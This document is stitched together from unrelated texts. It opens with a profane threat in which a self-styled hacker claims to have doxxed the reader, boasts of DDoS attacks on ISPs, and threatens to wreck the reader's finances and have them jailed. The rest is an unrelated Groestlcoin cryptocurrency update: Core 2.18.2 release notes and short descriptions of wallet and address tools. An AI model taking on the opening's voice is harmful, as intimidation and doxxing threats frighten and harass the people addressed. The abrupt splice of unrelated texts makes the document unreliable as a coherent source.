my power has granted me the ability to render entire computer networks completely offline. I have sent tens of thousands of ddos attacks for three weeks using my IRC and Web Chat clients (CrackMyDNS, Argus, ZNC, etc), I've zapped multiple ISPs in two countries, and I was responsible for multiple data leaks. I've kept a spreadsheet of IP addresses and Domain Names that have been compromised by me. I have the means to completely empty out a region of a major ISP. It doesn't take a rocket scientist to see that I'm the emperor of the Internet. So, I finished doxxed you, how do you feel about that? Your email, and other info i listed is sent to an elite dark web hacker group, known as CssHackers. They will process my data, and will massively ddos you along with my own computational ddos station right here in alaska. Tough luck bud. Our combined ddos attacks will be enough to make your router explode; you really have no way to wiggle out of this. Maybe next time, you shouldn't have picked a fight with someone way out of your league, bud. I know your IP address from our previous engagement also. I don't care if you have the courts lined up, I have 2, 4 layer proxies that are stacked up each other, location spoofer, ddos protection, information spoofer, temp emails, basically every security measure out there. It would take millions of yours for you to even crack my name, bud. Maybe you should rethink your life choices, asshole, and maybe I'll add you to the whitelist. CssHackers are simply an elite. A big name, they have worked with intelligence agencies to unlock mails and computer systems. They are absolute master hackers. We will send your information to CssHackers and they will unlock your mails and computer systems and turn them into a boatload of malware that will leak its way into your bank account and other sources of private info. Well, you know what. After I'm done with all the damage to your finances and status, I can have you arrested and thrown in prison. This was done by my sophisticated ai robotic network, adt, (automatic doxing tool), in less than a minute. You may call me a script kiddie, but this program is a state of the art doxxer, fbi and cia agents have even personally ASKED ME for this program. Also, this tool is 100% independent and undetectable from servers and some clients, so no security loopholes are created.
Dear Groestlers, it goes without saying that 2020 has been a difficult time for millions of people worldwide. The groestlcoin team would like to take this opportunity to wish everyone our best to everyone coping with the direct and indirect effects of COVID-19. Let it bring out the best in us all and show that collectively, we can conquer anything. The centralised banks and our national governments are facing unprecedented times with interest rates worldwide dropping to record lows in places. Rest assured that this can only strengthen the fundamentals of all decentralised cryptocurrencies and the vision that was seeded with Satoshi's Bitcoin whitepaper over 10 years ago. Despite everything that has been thrown at us this year, the show must go on and the team will still progress and advance to continue the momentum that we have developed over the past 6 years. In addition to this, we'd like to remind you all that this is Groestlcoin's 6th Birthday release! In terms of price there have been some crazy highs and lows over the years (with highs of around $2.60 and lows of $0.000077!), but in terms of value– Groestlcoin just keeps getting more valuable! In these uncertain times, one thing remains clear – Groestlcoin will keep going and keep innovating regardless. On with what has been worked on and completed over the past few months.
UPDATED - Groestlcoin Core 2.18.2
This is a major release of Groestlcoin Core with many protocol level improvements and code optimizations, featuring the technical equivalent of Bitcoin v0.18.2 but with Groestlcoin-specific patches. On a general level, most of what is new is a new 'Groestlcoin-wallet' tool which is now distributed alongside Groestlcoin Core's other executables. NOTE: The 'Account' API has been removed from this version which was typically used in some tip bots. Please ensure you check the release notes from 2.17.2 for details on replacing this functionality.
Builds are now done through Gitian
Calls to getblocktemplate will fail if the segwit rule is not specified. Calling getblocktemplate without segwit specified is almost certainly a misconfiguration since doing so results in lower rewards for the miner. Failed calls will produce an error message describing how to enable the segwit rule.
A warning is printed if an unrecognized section name is used in the configuration file. Recognized sections are [test], [main], and [regtest].
Four new options are available for configuring the maximum number of messages that ZMQ will queue in memory (the "high water mark") before dropping additional messages. The default value is 1,000, the same as was used for previous releases.
The rpcallowip option can no longer be used to automatically listen on all network interfaces. Instead, the rpcbind parameter must be used to specify the IP addresses to listen on. Listening for RPC commands over a public network connection is insecure and should be disabled, so a warning is now printed if a user selects such a configuration. If you need to expose RPC in order to use a tool like Docker, ensure you only bind RPC to your localhost, e.g. docker run [...] -p 127.0.0.1:1441:1441 (this is an extra :1441 over the normal Docker port specification).
The rpcpassword option now causes a startup error if the password set in the configuration file contains a hash character (#), as it's ambiguous whether the hash character is meant for the password or as a comment.
The whitelistforcerelay option is used to relay transactions from whitelisted peers even when not accepted to the mempool. This option now defaults to being off, so that changes in policy and disconnect/ban behavior will not cause a node that is whitelisting another to be dropped by peers.
A new short about the JSON-RPC interface describes cases where the results of anRPC might contain inconsistencies between data sourced from differentsubsystems, such as wallet state and mempool state.
A new document introduces Groestlcoin Core's BIP174 interface, which is used to allow multiple programs to collaboratively work to create, sign, and broadcast new transactions. This is useful for offline (cold storage) wallets, multisig wallets, coinjoin implementations, and many other cases where two or more programs need to interact to generate a complete transaction.
The output script descriptor (https://github.com/groestlcoin/groestlcoin/blob/mastedoc/descriptors.md) documentation has been updated with information about new features in this still-developing language for describing the output scripts that a wallet or other program wants to receive notifications for, such as which addresses it wants to know received payments. The language is currently used in multiple new and updated RPCs described in these release notes and is expected to be adapted to other RPCs and to the underlying wallet structure.
A new --disable-bip70 option may be passed to ./configure to prevent Groestlcoin-Qt from being built with support for the BIP70 payment protocol or from linking libssl. As the payment protocol has exposed Groestlcoin Core to libssl vulnerabilities in the past, builders who don't need BIP70 support are encouraged to use this option to reduce their exposure to future vulnerabilities.
The minimum required version of Qt (when building the GUI) has been increased from 5.2 to 5.5.1 (the depends system provides 5.9.7)
getnodeaddresses returns peer addresses known to this node. It may be used to find nodes to connect to without using a DNS seeder.
listwalletdir returns a list of wallets in the wallet directory (either the default wallet directory or the directory configured bythe -walletdir parameter).
getrpcinfo returns runtime details of the RPC server. Currently, it returns an array of the currently active commands and how long they've been running.
deriveaddresses returns one or more addresses corresponding to an output descriptor.
getdescriptorinfo accepts a descriptor and returns information aboutit, including its computed checksum.
joinpsbts merges multiple distinct PSBTs into a single PSBT. The multiple PSBTs must have different inputs. The resulting PSBT will contain every input and output from all the PSBTs. Any signatures provided in any of the PSBTs will be dropped.
analyzepsbt examines a PSBT and provides information about what the PSBT contains and the next steps that need to be taken in order to complete the transaction. For each input of a PSBT, analyze psbt provides information about what information is missing for that input, including whether a UTXO needs to be provided, what pubkeys still need to be provided, which scripts need to be provided, and what signatures are still needed. Every input will also list which role is needed to complete that input, and analyzepsbt will also list the next role in general needed to complete the PSBT. analyzepsbt will also provide the estimated fee rate and estimated virtual size of the completed transaction if it has enough information to do so.
utxoupdatepsbt searches the set of Unspent Transaction Outputs (UTXOs) to find the outputs being spent by the partial transaction. PSBTs need to have the UTXOs being spent to be provided because the signing algorithm requires information from the UTXO being spent. For segwit inputs, only the UTXO itself is necessary. For non-segwit outputs, the entire previous transaction is needed so that signers can be sure that they are signing the correct thing. Unfortunately, because the UTXO set only contains UTXOs and not full transactions, utxoupdatepsbt will only add the UTXO for segwit inputs.
getpeerinfo now returns an additional minfeefilter field set to the peer's BIP133 fee filter. You can use this to detect that you have peers that are willing to accept transactions below the default minimum relay fee.
The mempool RPCs, such as getrawmempool with verbose=true, now return an additional "bip125-replaceable" value indicating whether thetransaction (or its unconfirmed ancestors) opts-in to asking nodes and miners to replace it with a higher-feerate transaction spending any of the same inputs.
settxfee previously silently ignored attempts to set the fee below the allowed minimums. It now prints a warning. The special value of"0" may still be used to request the minimum value.
getaddressinfo now provides an ischange field indicating whether the wallet used the address in a change output.
importmulti has been updated to support P2WSH, P2WPKH, P2SH-P2WPKH, and P2SH-P2WSH. Requests for P2WSH and P2SH-P2WSH accept an additional witnessscript parameter.
importmulti now returns an additional warnings field for each request with an array of strings explaining when fields are being ignored or are inconsistent, if there are any.
getaddressinfo now returns an additional solvable Boolean field when Groestlcoin Core knows enough about the address's scriptPubKey, optional redeemScript, and optional witnessScript for the wallet to be able to generate an unsigned input spending funds sent to that address.
The getaddressinfo, listunspent, and scantxoutset RPCs now return an additional desc field that contains an output descriptor containing all key paths and signing information for the address (except for the private key). The desc field is only returned for getaddressinfo and listunspent when the address is solvable.
importprivkey will preserve previously-set labels for addresses or public keys corresponding to the private key being imported. For example, if you imported a watch-only address with the label "coldwallet" in earlier releases of Groestlcoin Core, subsequently importing the private key would default to resetting the address's label to the default empty-string label (""). In this release, the previous label of "cold wallet" will be retained. If you optionally specify any label besides the default when calling importprivkey, the new label will be applied to the address.
getmininginfo now omits currentblockweight and currentblocktx when a block was never assembled via RPC on this node.
The getrawtransaction RPC & REST endpoints no longer check the unspent UTXO set for a transaction. The remaining behaviors are as follows:
If a blockhash is provided, check the corresponding block.
If no blockhash is provided, check the mempool.
If no blockhash is provided but txindex is enabled, also check txindex.
unloadwallet is now synchronous, meaning it will not return until the wallet is fully unloaded.
importmulti now supports importing of addresses from descriptors. A desc parameter can be provided instead of the "scriptPubKey" in are quest, as well as an optional range for ranged descriptors to specify the start and end of the range to import. Descriptors with key origin information imported through importmulti will have their key origin information stored in the wallet for use with creating PSBTs.
listunspent has been modified so that it also returns witnessScript, the witness script in the case of a P2WSH orP2SH-P2WSH output.
createwallet now has an optional blank argument that can be used to create a blank wallet. Blank wallets do not have any keys or HDseed. They cannot be opened in software older than 2.18.2. Once a blank wallet has a HD seed set (by using sethdseed) or private keys, scripts, addresses, and other watch only things have been imported, the wallet is no longer blank and can be opened in 2.17.2. Encrypting a blank wallet will also set a HD seed for it.
signrawtransaction is removed after being deprecated and hidden behind a special configuration option in version 2.17.2.
The 'account' API is removed after being deprecated in v2.17.2 The 'label' API was introduced in v2.17.2 as a replacement for accounts. See the release notes from v2.17.2 for a full description of the changes from the 'account' API to the 'label' API.
addwitnessaddress is removed after being deprecated in version 2.16.0.
generate is deprecated and will be fully removed in a subsequent major version. This RPC is only used for testing, but its implementation reached across multiple subsystems (wallet and mining), so it is being deprecated to simplify the wallet-node interface. Projects that are using generate for testing purposes should transition to using the generatetoaddress RPC, which does not require or use the wallet component. Calling generatetoaddress with an address returned by the getnewaddress RPC gives the same functionality as the old generate RPC. To continue using generate in this version, restart groestlcoind with the -deprecatedrpc=generate configuration option.
Be reminded that parts of the validateaddress command have been deprecated and moved to getaddressinfo. The following deprecated fields have moved to getaddressinfo: ismine, iswatchonly, script, hex, pubkeys, sigsrequired, pubkey, embedded, iscompressed, label, timestamp, hdkeypath, hdmasterkeyid.
The addresses field has been removed from the validateaddressand getaddressinfo RPC methods. This field was confusing since it referred to public keys using their P2PKH address. Clients should use the embedded.address field for P2SH or P2WSH wrapped addresses, and pubkeys for inspecting multisig participants.
A new /rest/blockhashbyheight/ endpoint is added for fetching the hash of the block in the current best blockchain based on its height (how many blocks it is after the Genesis Block).
A new Window menu is added alongside the existing File, Settings, and Help menus. Several items from the other menus that opened new windows have been moved to this new Window menu.
In the Send tab, the checkbox for "pay only the required fee" has been removed. Instead, the user can simply decrease the value in the Custom Fee rate field all the way down to the node's configured minimumrelay fee.
In the Overview tab, the watch-only balance will be the only balance shown if the wallet was created using the createwallet RPC and thedisable_private_keys parameter was set to true.
The launch-on-startup option is no longer available on macOS if compiled with macosx min version greater than 10.11 (useCXXFLAGS="-mmacosx-version-min=10.11" CFLAGS="-mmacosx-version-min=10.11" for setting the deployment sdkversion)
A new groestlcoin-wallet tool is now distributed alongside Groestlcoin Core's other executables. Without needing to use any RPCs, this tool can currently create a new wallet file or display some basic information about an existing wallet, such as whether the wallet is encrypted, whether it uses an HD seed, how many transactions it contains, and how many address book entries it has.
Since version 2.16.0, Groestlcoin Core's built-in wallet has defaulted to generating P2SH-wrapped segwit addresses when users want to receive payments. These addresses are backwards compatible with all widely used software. Starting with Groestlcoin Core 2.20.1 (expected about a year after 2.18.2), Groestlcoin Core will default to native segwitaddresses (bech32) that provide additional fee savings and other benefits. Currently, many wallets and services already support sending to bech32 addresses, and if the Groestlcoin Core project sees enough additional adoption, it will instead default to bech32 receiving addresses in Groestlcoin Core 2.19.1. P2SH-wrapped segwit addresses will continue to be provided if the user requests them in the GUI or by RPC, and anyone who doesn't want the update will be able to configure their default address type. (Similarly, pioneering users who want to change their default now may set the addresstype=bech32 configuration option in any Groestlcoin Core release from 2.16.0 up.)
BIP 61 reject messages are now deprecated. Reject messages have no use case on the P2P network and are only logged for debugging by most network nodes. Furthermore, they increase bandwidth and can be harmful for privacy and security. It has been possible to disable BIP 61 messages since v2.17.2 with the -enablebip61=0 option. BIP 61 messages will be disabled by default in a future version, before being removed entirely.
The submitblock RPC previously returned the reason a rejected block was invalid the first time it processed that block but returned a generic "duplicate" rejection message on subsequent occasions it processed the same block. It now always returns the fundamental reason for rejecting an invalid block and only returns "duplicate" for valid blocks it has already accepted.
A new submitheader RPC allows submitting block headers independently from their block. This is likely only useful for testing.
The signrawtransactionwithkey and signrawtransactionwithwallet RPCs have been modified so that they also optionally accept a witnessScript, the witness script in the case of a P2WSH orP2SH-P2WSH output. This is compatible with the change to listunspent.
For the walletprocesspsbt and walletcreatefundedpsbt RPCs, if thebip32derivs parameter is set to true but the key metadata for a public key has not been updated yet, then that key will have a derivation path as if it were just an independent key (i.e. no derivation path and its master fingerprint is itself).
The -usehd configuration option was removed in version 2.16.0 From that version onwards, all new wallets created are hierarchical deterministic wallets. This release makes specifying -usehd an invalid configuration option.
This release allows peers that your node automatically disconnected for misbehaviour (e.g. sending invalid data) to reconnect to your node if you have unused incoming connection slots. If your slots fill up, a misbehaving node will be disconnected to make room for nodes without a history of problems (unless the misbehaving node helps your node in some other way, such as by connecting to a part of the Internet from which you don't have many other peers). Previously, Groestlcoin Core banned the IP addresses of misbehaving peers for a period (default of 1 day); this was easily circumvented by attackers with multiple IP addresses. If you manually ban a peer, such as by using the setban RPC, all connections from that peer will still be rejected.
The key metadata will need to be upgraded the first time that the HDseed is available. For unencrypted wallets this will occur on wallet loading. For encrypted wallets this will occur the first time the wallet is unlocked.
Newly encrypted wallets will no longer require restarting the software. Instead such wallets will be completely unloaded and reloaded to achieve the same effect.
A sub-project of Bitcoin Core now provides Hardware Wallet Interaction (HWI) scripts that allow command-line users to use several popular hardware key management devices with Groestlcoin Core. See their project page for details.
This release changes the Random Number Generator (RNG) used from OpenSSL to Groestlcoin Core's own implementation, although entropy gathered by Groestlcoin Core is fed out to OpenSSL and then read back in when the program needs strong randomness. This moves Groestlcoin Core a little closer to no longer needing to depend on OpenSSL, a dependency that has caused security issues in the past. The new implementation gathers entropy from multiple sources, including from hardware supporting the rdseed CPU instruction.
On macOS, Groestlcoin Core now opts out of application CPU throttling ("app nap") during initial blockchain download, when catching up from over 100 blocks behind the current chain tip, or when reindexing chain data. This helps prevent these operations from taking an excessively long time because the operating system is attempting to conserve power.
How to Upgrade?
Windows If you are running an older version, shut it down. Wait until it has completely shut down (which might take a few minutes for older versions), then run the installer. OSX If you are running an older version, shut it down. Wait until it has completely shut down (which might take a few minutes for older versions), run the dmg and drag Groestlcoin Core to Applications. Coin Control - This can be accessed from the Send Transaction view and basically allows users to select from a list of available UTXO's to include in their transaction.
HODL GRS connects directly to the Groestlcoin network using SPV mode and doesn't rely on servers that can be hacked or disabled. HODL GRS utilizes AES hardware encryption, app sandboxing, and the latest security features to protect users from malware, browser security holes, and even physical theft. Private keys are stored only in the secure enclave of the user's phone, inaccessible to anyone other than the user. Simplicity and ease-of-use is the core design principle of HODL GRS. A simple recovery phrase (which we call a Backup Recovery Key) is all that is needed to restore the user's wallet if they ever lose or replace their device. HODL GRS is deterministic, which means the user's balance and transaction history can be recovered just from the backup recovery key.
Features
Simplified payment verification for fast mobile performance
Groestlcoin Seed Savior is a tool for recovering BIP39 seed phrases. This tool is meant to help users with recovering a slightly incorrect Groestlcoin mnemonic phrase (AKA backup or seed). You can enter an existing BIP39 mnemonic and get derived addresses in various formats. To find out if one of the suggested addresses is the right one, you can click on the suggested address to check the address' transaction history on a block explorer.
Features
If a word is wrong, the tool will try to suggest the closest option.
If a word is missing or unknown, please type "?" instead and the tool will find all relevant options.
NOTE: NVidia GPU or any CPU only. AMD graphics cards will not work with this address generator. VanitySearch is a command-line Segwit-capable vanity Groestlcoin address generator. Add unique flair when you tell people to send Groestlcoin. Alternatively, VanitySearch can be used to generate random addresses offline. If you're tired of the random, cryptic addresses generated by regular groestlcoin clients, then VanitySearch is the right choice for you to create a more personalized address. VanitySearch is a groestlcoin address prefix finder. If you want to generate safe private keys, use the -s option to enter your passphrase which will be used for generating a base key as for BIP38 standard (VanitySearch.exe -s "My PassPhrase" FXPref). You can also use VanitySearch.exe -ps "My PassPhrase" which will add a crypto secure seed to your passphrase. VanitySearch may not compute a good grid size for your GPU, so try different values using -g option in order to get the best performances. If you want to use GPUs and CPUs together, you may have best performances by keeping one CPU core for handling GPU(s)/CPU exchanges (use -t option to set the number of CPU threads).
Features
Fixed size arithmetic
Fast Modular Inversion (Delayed Right Shift 62 bits)
SecpK1 Fast modular multiplication (2 steps folding 512bits to 256bits using 64 bits digits)

Groestlcoin Electrum Personal Server aims to make using Electrum Groestlcoin wallet more secure and more private. It makes it easy to connect your Electrum-GRS wallet to your own full node. It is an implementation of the Electrum-grs server protocol which fulfils the specific need of using the Electrum-grs wallet backed by a full node, but without the heavyweight server backend, for a single user. It allows the user to benefit from all Groestlcoin Core's resource-saving features like pruning, blocks only and disabled txindex. All Electrum-GRS's feature-richness like hardware wallet integration, multi-signature wallets, offline signing, seed recovery phrases, coin control and so on can still be used, but connected only to the user's own full node. Full node wallets are important in Groestlcoin because they are a big part of what makes the system be trust-less. No longer do people have to trust a financial institution like a bank or PayPal, they can run software on their own computers. If Groestlcoin is digital gold, then a full node wallet is your own personal goldsmith who checks for you that received payments are genuine. Full node wallets are also important for privacy. Using Electrum-GRS under default configuration requires it to send (hashes of) all your Groestlcoin addresses to some server. That server can then easily spy on your transactions. Full node wallets like Groestlcoin Electrum Personal Server would download the entire blockchain and scan it for the user's own addresses, and therefore don't reveal to anyone else which Groestlcoin addresses they are interested in. Groestlcoin Electrum Personal Server can also broadcast transactions through Tor which improves privacy by resisting traffic analysis for broadcasted transactions which can link the IP address of the user to the transaction. If enabled this would happen transparently whenever the user simply clicks "Send" on a transaction in Electrum-grs wallet. Note: Currently Groestlcoin Electrum Personal Server can only accept one connection at a time.
Features
Use your own node
Tor support
Uses less CPU and RAM than ElectrumX
Used intermittently rather than needing to be always-on
Doesn't require an index of every Groestlcoin address ever used like on ElectrumX
